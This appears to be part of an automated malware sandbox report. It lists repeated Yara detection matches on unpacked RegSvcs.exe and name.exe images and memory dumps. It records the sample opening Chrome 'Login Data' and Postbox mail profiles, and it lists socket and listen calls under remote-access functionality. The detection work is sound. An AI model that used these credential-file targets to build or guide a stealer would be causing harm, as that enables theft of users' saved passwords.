Source: Yara match File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.887505835.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: name.exe Binary or memory string: WIN_81
Source: name.exe Binary or memory string: WIN_XP
Source: name.exe.5.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: name.exe Binary or memory string: WIN_XPe
Source: name.exe Binary or memory string: WIN_VISTA
Source: name.exe Binary or memory string: WIN_7
Source: name.exe Binary or memory string: WIN_8
Source: Yara match File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.887505835.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01071204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 8_2_01071204
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01071806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 8_2_01071806
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013B1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 11_2_013B1204
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013B1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 11_2_013B1806